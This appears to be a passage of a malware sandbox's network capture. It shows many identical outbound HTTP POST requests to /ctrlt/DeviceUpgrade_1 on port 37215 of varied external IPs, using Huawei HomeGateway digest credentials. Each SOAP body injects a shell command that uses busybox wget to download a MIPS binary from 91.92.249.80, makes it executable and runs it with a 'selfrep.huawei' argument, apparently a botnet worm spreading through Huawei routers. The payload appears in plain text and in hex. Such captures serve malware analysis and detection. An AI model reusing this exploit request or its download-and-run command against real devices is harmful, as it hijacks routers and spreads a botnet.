                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2452192.168.2.2336756197.18.48.14837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.702619076 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2453192.168.2.2359058197.220.63.14937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.703835011 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2454192.168.2.2358358157.62.254.12137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.703882933 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2455192.168.2.234126841.9.173.23537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.703927994 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2456192.168.2.2337810157.230.143.16037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.704008102 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2457192.168.2.2345648197.236.106.3537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.704040051 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2458192.168.2.2334692197.94.152.1537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.704070091 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2459192.168.2.2350980197.128.145.15337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.704071999 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2460192.168.2.2346220197.234.112.23937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.704750061 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2461192.168.2.2341858177.153.86.2837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.704809904 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2462192.168.2.2344684157.220.228.21837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.704828024 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
